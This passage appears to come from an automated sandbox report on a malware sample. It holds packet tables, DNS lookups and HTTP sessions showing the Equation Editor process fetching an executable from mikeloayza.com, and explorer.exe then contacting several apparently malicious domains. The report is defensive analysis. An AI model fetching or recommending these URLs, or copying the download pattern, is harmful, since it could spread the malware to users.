                                              Jan 14, 2022 16:04:35.515399933 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.515492916 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.515561104 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.515573978 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.515604973 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.515619040 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.515795946 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.697778940 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.698010921 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.698127985 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.698180914 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.698206902 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.698276043 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.698321104 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.698429108 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.698492050 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.698589087 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.698719978 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880594015 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880655050 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880733013 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880759001 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880779982 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880796909 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880805016 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880819082 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880861044 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880877972 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880930901 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880981922 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.881046057 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.881048918 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.881058931 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.881093979 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.881150961 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.063811064 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.063884020 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064023972 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064043999 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064068079 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064124107 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064136028 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064156055 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064169884 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064194918 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064238071 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064457893 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064536095 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064630985 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064646006 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064656973 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064711094 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.065083027 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.065138102 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.065174103 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.065182924 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.065238953 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.065263987 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.065325022 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.101618052 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.101684093 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.101718903 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.101737022 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.101748943 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.101754904 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.101772070 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.101780891 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248202085 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248265028 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248383999 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248436928 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248467922 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248492002 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248526096 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248541117 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248564959 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248634100 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248655081 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248713970 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248836040 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249326944 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249375105 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249403954 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249427080 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249447107 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249466896 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249478102 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249494076 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249509096 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249521971 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249561071 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249577999 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249593973 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249615908 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249628067 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249639034 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249677896 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249680042 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249690056 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249762058 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249779940 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249824047 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249845028 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249898911 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.249916077 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.249974966 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.265113115 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.287471056 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.287612915 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.287668943 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.287688971 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.287722111 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.287761927 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.287765980 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.287897110 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.287983894 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.288053036 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.288129091 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.288590908 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.432569981 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.432648897 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.432656050 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.432672977 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.432713985 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.432811975 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.432873011 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.432888985 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.432892084 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.432945967 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.433195114 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.433269024 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.433274031 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.433288097 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.433330059 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.433718920 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.433813095 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.433875084 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.433945894 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.434010983 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.434338093 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.434437990 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.434472084 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.434484959 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.434494019 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.434520006 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.434773922 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.434839010 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.434870005 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.434947968 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.435249090 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.435309887 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.435323954 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.435380936 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.435676098 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.435748100 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.435750008 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.435762882 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.435803890 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.436230898 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.436317921 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.436326027 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.436342955 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.436388016 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.441907883 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.471496105 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.471570969 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.471681118 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.471705914 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.471729994 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.471740961 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.471770048 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.471851110 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.471901894 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.471914053 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.471965075 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.472717047 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.617836952 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.617923021 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.618017912 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.618058920 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.618083000 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.618094921 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.618153095 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.618432999 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.620714903 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.620768070 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.620882034 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.620888948 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.620908022 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.620985031 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.621057034 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.621068001 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.621084929 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.621098042 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.621129990 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.621150017 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.621157885 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.621221066 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.621268988 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.621279955 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.621298075 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.621320963 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.621325970 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.621361971 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.621411085 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.629693031 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.640779972 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.640815020 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:38.035305023 CET4916780192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:05:43.605257988 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.622224092 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.622328043 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.622512102 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.639312029 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705197096 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705229998 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705254078 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705276012 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705297947 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705321074 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705343008 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705363989 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705384970 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705406904 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.705429077 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.705467939 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.705574036 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.724138975 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.724184990 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.724282026 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.724307060 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.724663973 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.724688053 CET8049169216.239.34.21192.168.2.22
                                              Jan 14, 2022 16:05:43.724720955 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:43.724736929 CET4916980192.168.2.22216.239.34.21
                                              Jan 14, 2022 16:05:53.746768951 CET4917180192.168.2.22162.0.209.73
                                              Jan 14, 2022 16:05:53.933163881 CET8049171162.0.209.73192.168.2.22
                                              Jan 14, 2022 16:05:53.933317900 CET4917180192.168.2.22162.0.209.73
                                              Jan 14, 2022 16:05:53.933439016 CET4917180192.168.2.22162.0.209.73
                                              Jan 14, 2022 16:05:54.111656904 CET8049171162.0.209.73192.168.2.22
                                              Jan 14, 2022 16:05:54.111696959 CET8049171162.0.209.73192.168.2.22
                                              Jan 14, 2022 16:05:54.111931086 CET4917180192.168.2.22162.0.209.73
                                              Jan 14, 2022 16:05:54.111978054 CET4917180192.168.2.22162.0.209.73
                                              Jan 14, 2022 16:05:54.279328108 CET8049171162.0.209.73192.168.2.22
                                              Jan 14, 2022 16:06:04.229212999 CET4917280192.168.2.2234.102.136.180
                                              Jan 14, 2022 16:06:04.249311924 CET804917234.102.136.180192.168.2.22
                                              Jan 14, 2022 16:06:04.249404907 CET4917280192.168.2.2234.102.136.180
                                              Jan 14, 2022 16:06:04.249555111 CET4917280192.168.2.2234.102.136.180
                                              Jan 14, 2022 16:06:04.269602060 CET804917234.102.136.180192.168.2.22
                                              Jan 14, 2022 16:06:04.365375996 CET804917234.102.136.180192.168.2.22
                                              Jan 14, 2022 16:06:04.365398884 CET804917234.102.136.180192.168.2.22
                                              Jan 14, 2022 16:06:04.365621090 CET4917280192.168.2.2234.102.136.180
                                              Jan 14, 2022 16:06:04.365680933 CET4917280192.168.2.2234.102.136.180
                                              Jan 14, 2022 16:06:04.384483099 CET804917234.102.136.180192.168.2.22
                                              Jan 14, 2022 16:06:09.673098087 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:12.678507090 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:18.685014009 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:19.047472954 CET8049173118.67.131.217192.168.2.22
                                              Jan 14, 2022 16:06:19.047573090 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:19.047626972 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:19.415909052 CET8049173118.67.131.217192.168.2.22
                                              Jan 14, 2022 16:06:19.428003073 CET8049173118.67.131.217192.168.2.22
                                              Jan 14, 2022 16:06:19.428040028 CET8049173118.67.131.217192.168.2.22
                                              Jan 14, 2022 16:06:19.428190947 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:19.428250074 CET4917380192.168.2.22118.67.131.217
                                              Jan 14, 2022 16:06:19.793454885 CET8049173118.67.131.217192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 14, 2022 16:04:33.695847034 CET5216753192.168.2.228.8.8.8
                                              Jan 14, 2022 16:04:33.875735044 CET53521678.8.8.8192.168.2.22
                                              Jan 14, 2022 16:05:43.551692963 CET5059153192.168.2.228.8.8.8
                                              Jan 14, 2022 16:05:43.590673923 CET53505918.8.8.8192.168.2.22
                                              Jan 14, 2022 16:05:53.711869001 CET5780553192.168.2.228.8.8.8
                                              Jan 14, 2022 16:05:53.744340897 CET53578058.8.8.8192.168.2.22
                                              Jan 14, 2022 16:05:59.160648108 CET5903053192.168.2.228.8.8.8
                                              Jan 14, 2022 16:05:59.182547092 CET53590308.8.8.8192.168.2.22
                                              Jan 14, 2022 16:06:04.200428963 CET5918553192.168.2.228.8.8.8
                                              Jan 14, 2022 16:06:04.228068113 CET53591858.8.8.8192.168.2.22
                                              Jan 14, 2022 16:06:09.376717091 CET5561653192.168.2.228.8.8.8
                                              Jan 14, 2022 16:06:09.671801090 CET53556168.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Jan 14, 2022 16:04:33.695847034 CET192.168.2.228.8.8.80x5e41Standard query (0)mikeloayza.comA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:43.551692963 CET192.168.2.228.8.8.80x8eb8Standard query (0)www.fisioletsgo.comA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:53.711869001 CET192.168.2.228.8.8.80xc18cStandard query (0)www.bitcointradel.comA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:59.160648108 CET192.168.2.228.8.8.80xfc43Standard query (0)www.freeadakahamazon.comA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:06:04.200428963 CET192.168.2.228.8.8.80x9c63Standard query (0)www.executive-air.netA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:06:09.376717091 CET192.168.2.228.8.8.80x30e0Standard query (0)www.luckyfandom.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Jan 14, 2022 16:04:33.875735044 CET8.8.8.8192.168.2.220x5e41No error (0)mikeloayza.com131.153.37.4A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET8.8.8.8192.168.2.220x8eb8No error (0)www.fisioletsgo.com216.239.34.21A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET8.8.8.8192.168.2.220x8eb8No error (0)www.fisioletsgo.com216.239.32.21A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET8.8.8.8192.168.2.220x8eb8No error (0)www.fisioletsgo.com216.239.38.21A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET8.8.8.8192.168.2.220x8eb8No error (0)www.fisioletsgo.com216.239.36.21A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:53.744340897 CET8.8.8.8192.168.2.220xc18cNo error (0)www.bitcointradel.combitcointradel.comCNAME (Canonical name)IN (0x0001)
                                              Jan 14, 2022 16:05:53.744340897 CET8.8.8.8192.168.2.220xc18cNo error (0)bitcointradel.com162.0.209.73A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:59.182547092 CET8.8.8.8192.168.2.220xfc43Name error (3)www.freeadakahamazon.comnonenoneA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:06:04.228068113 CET8.8.8.8192.168.2.220x9c63No error (0)www.executive-air.netexecutive-air.netCNAME (Canonical name)IN (0x0001)
                                              Jan 14, 2022 16:06:04.228068113 CET8.8.8.8192.168.2.220x9c63No error (0)executive-air.net34.102.136.180A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:06:09.671801090 CET8.8.8.8192.168.2.220x30e0No error (0)www.luckyfandom.com118.67.131.217A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • mikeloayza.com
                                              • www.fisioletsgo.com
                                              • www.bitcointradel.com
                                              • www.executive-air.net
                                              • www.luckyfandom.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249168131.153.37.4443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.2249167131.153.37.480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Jan 14, 2022 16:04:34.101399899 CET0OUTGET /E9/i4L.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: mikeloayza.com
                                              Connection: Keep-Alive
                                              Jan 14, 2022 16:04:34.291004896 CET1INHTTP/1.1 301 Moved Permanently
                                              Date: Fri, 14 Jan 2022 15:04:33 GMT
                                              Server: Apache
                                              Location: https://mikeloayza.com/E9/i4L.exe
                                              Content-Length: 241
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 69 6b 65 6c 6f 61 79 7a 61 2e 63 6f 6d 2f 45 39 2f 69 34 4c 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mikeloayza.com/E9/i4L.exe">here</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.2249169216.239.34.2180C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
